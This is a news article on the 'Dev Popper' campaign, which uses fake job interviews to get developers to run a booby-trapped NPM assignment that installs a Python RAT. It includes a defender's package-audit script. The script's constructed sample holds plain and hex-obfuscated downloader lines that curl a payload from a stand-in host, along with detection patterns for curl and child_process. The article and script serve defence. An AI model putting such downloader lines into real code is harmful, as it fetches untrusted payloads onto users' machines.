A newly discovered cybercriminal operation identified as “Dev Popper” has emerged, targeting software developers with fraudulent job interviews, intending to trick them into installing a Python remote access trojan (RAT).
These deceptive interviews lure developers into executing tasks under the guise of the interview process, such as fetching and executing code from GitHub, to create an illusion of authenticity. Moreover, the primary objective of the threat actors is to persuade their targets to download hostile software that not only collects system data but also grants remote access to the host computer.
The new Dev Popper campaign relies on a multi-stage infection chain.
The attack orchestrated by the Dev Popper operators uses a multi-phase infection mechanism rooted in social engineering, designed to compromise victims step by step.
The perpetrators make first contact posing as employers seeking to fill software developer vacancies. During the simulated interviews, the attackers instruct candidates to retrieve and execute what is portrayed as a standard coding assignment from a GitHub repository.
This assignment is housed within a ZIP archive containing an NPM package, alongside a README.md and directories for frontend and backend components.
Upon executing the NPM package, the developer unknowingly runs a concealed, obfuscated JavaScript file named “imageDetails.js” in the backend directory. This script issues ‘curl’ commands from the Node.js process to fetch an additional archive (“p.zi”) from an external server.
This archive carries the next payload: a disguised Python script (“npl”) that serves as the RAT. Once running on the victim’s system, the RAT begins harvesting basic system information, such as OS type, hostname, and network data, and transmitting it to a command-and-control (C2) server.
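The report does not say how the package triggers “imageDetails.js”, so the example below, added here and not taken from the report or from the malware, is a defender’s pre-run audit of an unpacked NPM assignment: it flags install-time lifecycle hooks, scripts that spawn a shell command fetching remote content (the curl-from-Node pattern described above), and the cheap string obfuscation used to hide such calls. The sample package, its file names, the postinstall hook and the example.invalid URL are all constructed for illustration.

```javascript
const RISKY_HOOKS = ["preinstall", "install", "postinstall", "prepare"];
const SPAWN_RE = /child_process|\b(exec|execFile|spawn)(Sync)?\s*\(/;
const FETCH_RE = /\bcurl\b|\bwget\b|https?:\/\//;
const HEX_ESCAPE_RE = /\\x([0-9a-f]{2})/gi;

// Undo the cheapest obfuscation layer so "\x63\x75\x72\x6c" is matched as "curl".
function decodeHexEscapes(source) {
  return source.replace(HEX_ESCAPE_RE, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// files: map of relative path -> contents, as read from the unpacked package.
// Returns { file, reason } findings; an empty list means nothing was flagged.
function auditPackage(files) {
  const findings = [];
  const pkgJson = files["package.json"];
  if (pkgJson) {
    const scripts = JSON.parse(pkgJson).scripts || {};
    for (const hook of RISKY_HOOKS) {
      if (scripts[hook]) {
        findings.push({ file: "package.json", reason: `lifecycle hook "${hook}" runs on install: ${scripts[hook]}` });
      }
    }
  }
  for (const [path, content] of Object.entries(files)) {
    if (!path.endsWith(".js")) continue;
    // Heuristic: more than one \x escape per 50 characters is unusual for hand-written code.
    const escapes = (content.match(HEX_ESCAPE_RE) || []).length;
    if (escapes / content.length > 0.02) {
      findings.push({ file: path, reason: "dense \\x string escapes (obfuscation indicator)" });
    }
    const plain = decodeHexEscapes(content);
    if (SPAWN_RE.test(plain) && FETCH_RE.test(plain)) {
      findings.push({ file: path, reason: "spawns a shell command that fetches remote content" });
    }
  }
  return findings;
}

// Constructed sample: a clean frontend file, a plain and an obfuscated downloader in
// the backend directory, and a package.json that runs one of them at install time.
const SAMPLE_PACKAGE = {
  "package.json": JSON.stringify({ name: "assignment", scripts: { start: "node backend/server.js", postinstall: "node backend/imageDetails.js" } }),
  "frontend/app.js": "export function render() { return '<div>hello</div>'; }",
  "backend/imageDetails.js": "const { execSync } = require('child_process');\nexecSync('curl -sO http://example.invalid/p.zi');",
  "backend/helper.js": "require('\\x63\\x68\\x69\\x6c\\x64_process').exec('\\x63\\x75\\x72\\x6c -sO http://example.invalid/p.zi');",
};

for (const f of auditPackage(SAMPLE_PACKAGE)) console.log(`[!] ${f.file}: ${f.reason}`);
```

Run it against a real unpacked assignment by building the map from the files on disk before installing or executing anything; a hit is a reason to stop and inspect, not proof of malice.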
According to investigations, the RAT offers several functionalities: maintaining persistent connections for ongoing control; executing file system commands to steal specific data; remote command execution for further exploitation or malware delivery; direct FTP exfiltration of data from directories of interest such as ‘Documents’ and ‘Downloads’; and logging of clipboard content and keystrokes to monitor user activity and potentially capture credentials.
While the identities of the perpetrators behind the Dev Popper attack remain undisclosed, the use of fake job opportunities to distribute malware continues, emphasising the need for vigilance.
Authorities warn that threat actors capitalise on developers’ professional commitment and trust in the job application process. Software developers should therefore scrutinise prospective employers carefully before acting on an opportunity.